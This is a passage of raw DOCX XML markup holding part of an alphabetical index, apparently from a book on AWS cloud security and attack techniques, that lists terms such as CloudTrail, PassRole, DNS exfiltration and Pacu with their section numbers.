          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 11.1, 7.4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F5439"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Capital One 2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 10.2, bibliography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudFox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5, 18.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudGoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.3, 18.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 16, app C; data events — 16.5; StopLogging — 16.6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Cognito identity pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 4.5, 15.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Confused deputy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 7.6, 9.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Container escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 13.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Cross-account attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CTAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.5. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545EEB8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Dependency confusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 19.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Device-code flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 6.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DNS exfiltration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 17.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DynamoDB export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DynamoDB Streams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F0F5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EBS snapshot sharing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 11.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ECR image-pull poisoning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 13.6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ECS task metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 13.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ECS-on-EC2 node escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 13.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>EventBridge persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 14.2, 15.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ExternalId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 7.6, 9.5. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D0A6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GitHub Actions OIDC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 15.2, 19.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Glue Data Catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GuardDuty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 16.7, app C. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105AE72"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IAM Identity Center</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 15.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM Vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IMDS / IMDSv2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 10.1, 10.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IRSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 13.3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320223C1"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KMS grants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.25. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>KMS re-encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 17.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172282E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Lambda AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.14, 10.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Lambda execution role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 10.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Lambda layers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 10.6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Lambda UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.13, 10.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Launch templates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.30, 15.3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22038419"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MITRE ATT&amp;CK for Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 1.4, 17.7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF79D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Noseyparker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D210C63"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OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 9.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OIDC provider abuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 15.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4F42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Pacu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 5, 8.32, 18.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 7.5, 8.7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PMapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Prowler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.1. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55765860"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quiet-riot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 4.3, 18.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829322B"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RDS IAM auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RDS snapshot sharing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Redshift UNLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 12.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Replication (S3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 11.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Role chaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 9.1. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76668D"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S3 bucket notification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.22, 14.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>S3 replication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 11.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SAML federation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 2.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ScoutSuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Secrets Manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 17.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
